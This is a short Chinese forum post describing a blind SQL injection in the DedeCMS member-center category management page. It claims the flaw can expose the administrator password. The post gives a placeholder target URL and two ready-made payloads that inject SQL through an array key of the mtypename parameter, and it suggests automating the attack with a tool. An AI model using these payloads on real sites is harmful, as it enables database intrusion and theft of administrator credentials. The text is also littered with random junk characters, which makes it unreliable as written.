标题: DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码 [打印本页] 作者: admin 时间: 2012-12-20 08:08 标题: DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码 需要magic_quotes_gpc = Off,所以说是鸡肋啊.7 ]7 d# b6 T9 j% |; U+ q$ D
! v: e [" C! M1 @# y
& q- Y* |7 X& _6 u3 b* V1 ~* Z发生在数组key里的注射漏洞,有点意思.0 v% G0 M1 q1 |1 o' {3 f
0 J; f# Z' _# z+ S1 ~+ O这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下 ; r! [( G; M. A7 H5 N % V, a' w% y7 k' \/ w/ y, z1 o7 rhttp://www.xxx.com /dede/member/mtypes.php?dopost=save 9 T, {! x5 b% l, f: i8 K6 ^& Z # }* s/ W/ J$ f# q& ^. ^
exploit: : c% b' F/ b' A7 N5 F% r/ ymtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r$ w+ V( l- \+ g
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r% K' A. q1 u% F% o